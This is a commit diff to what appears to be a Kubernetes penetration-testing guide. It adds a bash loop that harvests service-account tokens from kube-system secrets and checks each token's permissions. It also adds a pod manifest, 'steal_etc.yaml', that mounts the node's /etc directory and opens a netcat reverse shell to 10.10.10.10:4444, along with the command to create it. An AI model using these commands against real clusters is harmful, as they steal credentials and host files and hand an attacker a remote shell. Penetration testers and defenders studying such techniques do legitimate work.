GitBook: [master] 454 pages modified
This commit is contained in:
parent
f7b6e4a914
commit
b486b9fee1
@ -74,7 +74,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
|
|||||||
|
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to add the option `-o json` or `-o yaml`
|
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
### Get namespaces
|
### Get namespaces
|
||||||
@ -115,6 +115,12 @@ https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
|
|||||||
{% endtab %}
|
{% endtab %}
|
||||||
{% endtabs %}
|
{% endtabs %}
|
||||||
|
|
||||||
|
If you can read secrets you can use the following lines to get the privileges related to each to token:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
for token in `./kubectl describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; ./kubectl --token $token auth can-i --list; echo; done
|
||||||
|
```
|
||||||
|
|
||||||
### Get Current Privileges
|
### Get Current Privileges
|
||||||
|
|
||||||
{% tabs %}
|
{% tabs %}
|
||||||
|
@ -89,6 +89,40 @@ So just create the malicious pod and expect the secrets in port 6666:
|
|||||||
|
|
||||||
![](../../.gitbook/assets/image%20%28470%29.png)
|
![](../../.gitbook/assets/image%20%28470%29.png)
|
||||||
|
|
||||||
|
## **Pod Creationv2**
|
||||||
|
|
||||||
|
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
|
||||||
|
|
||||||
|
{% code title="steal\_etc.yaml" %}
|
||||||
|
```yaml
|
||||||
|
apiVersion: v1
|
||||||
|
kind: Pod
|
||||||
|
metadata:
|
||||||
|
name: stealetc-pod
|
||||||
|
spec:
|
||||||
|
containers:
|
||||||
|
- name: givemeyouretc
|
||||||
|
image: alpine
|
||||||
|
command: ["/bin/sh"]
|
||||||
|
args: ["-c", "nc 10.10.10.10 4444 -e /bin/sh"]
|
||||||
|
volumeMounts:
|
||||||
|
- mountPath: /mnt
|
||||||
|
name: volume
|
||||||
|
volumes:
|
||||||
|
- name: volume
|
||||||
|
hostPath:
|
||||||
|
path: /etc
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
Create the pod with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
kubectl --token $token create -f abuse2.yaml
|
||||||
|
```
|
||||||
|
|
||||||
|
And capturing the reverse shell you can find the `/etc` directory of the node mounted in `/mnt` inside the pod.
|
||||||
|
|
||||||
## **Create/Update Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
|
## **Create/Update Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
|
||||||
|
|
||||||
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
|
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
|
||||||
|
Loading…
Reference in New Issue
Block a user